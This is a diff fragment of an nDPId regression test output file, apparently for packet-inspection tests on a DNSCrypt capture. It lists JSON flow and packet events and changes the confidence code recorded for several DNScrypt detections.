00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":946739318062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318062,"pkt":"ZmZmZmZmRERERERECABFAADX+4tAADQRFC6XUN5PCgAAAQG7lm8AwyEmXC6BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":946739318063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318063,"pkt":"ZmZmZmZmRERERERECABFAADX+4hAADQRFDGXUN5PCgAAAQG7unEAw\/0kXC2BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 
@@ -730,28 +730,28 @@ 00712{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":946739318168,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":946739318168,"pkt":"ZmZmZmZmRERERERECABFAADWEfAAADQRWDeOBM0vCgAAAQG7xNMAwo9hqlmBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAAVJsH+RdJNH3D0PM7heo\/dPPI3i1+4vLX8T10ivxa\/CqjJyTHnmZoOX4oJMyJ42Khrgw6i1Ft4Vh\/Rb2U7RsAXZ5P9pZAltiMSwIbLDTpLjw5sG+xMI0gbdPS4ze+O\/Bdnk\/2lkCW2IWX62bll+tm5sSrlu"} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":946739318168,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318168,"pkt":"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"} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318168,"flow_last_seen":946739318168,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318168,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":37328,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318169,"pkt":"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"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":366,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":35885,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuocgAL0R36EKAAABwb+7a4H\/AbsGBBdyLyoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":367,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":33279,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":368,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318169} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":368,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuocAub0RBHUKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuokgAL0R358KAAABwb+7a9PHAbsGBMWnLywBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":54215,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":946739318169,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAAXcuoggAL0R36AKAAABwb+7a7+QAbsGBNniLygBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJiZQAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318169,"flow_last_seen":946739318169,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318169,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.191.187.107","src_port":49040,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":371,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318169} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":371,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318169,"pkt":"REREREREZmZmZmZmCABFAABQuokAub0RBHMKAAABwb+7awAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":372,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318169} 